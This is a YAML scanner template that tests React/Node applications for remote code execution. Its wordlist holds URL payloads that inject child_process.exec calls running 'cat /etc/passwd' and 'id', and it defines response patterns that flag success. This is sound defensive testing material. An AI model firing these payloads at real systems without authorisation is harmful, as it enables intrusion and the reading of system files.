---
id: FRAMEWORK_RCE_REACT
info:
  name: "Framework RCE - React"
  description: "Tests whether React applications are vulnerable to Remote Code Execution through URL injection."
  details: "This test injects Node.js code execution payloads into React-specific URL paths to check if the application executes them, indicating a Remote Code Execution vulnerability."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_REACT
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
  url:
    extract: urlVar

wordLists:
  # React-specific URL paths
  reactPaths:
    - "/api/exploit?input=%27;require(%27child_process%27).exec(%27cat%20/etc/passwd%27)%27"
    - "/api/exploit?input=%27;require(%27child_process%27).exec(%27id%27)%27"
    - "/exploit?input=%27;require(%27child_process%27).exec(%27cat%20/etc/passwd%27)%27"
  
  # Command execution outcomes
  rceOutcomes:
    - "root:*:0:0:"
    - "root:.*:0:0:"
    - "uid=0"
    - "gid=0"
    - "Linux"
    - "Unix"
    - "GNU/Linux"
    - "bin/bash"
    - "bin/sh"
    - "/etc/passwd"
    - "daemon:"
    - "nobody:"
    - "www-data:"
    - "const { exec }"
    - "child_process"

execute:
  type: single
  requests:
    - req:
        - modify_url: "${reactPaths}"
        - modify_method: GET
        - replace_body: '{}'

validate:
  response_code:
    eq: 200
  response_payload:
    or:
      - regex: 'root:.*:0:0:'
      - contains_either: "${rceOutcomes}"
    length:
      gt: 0
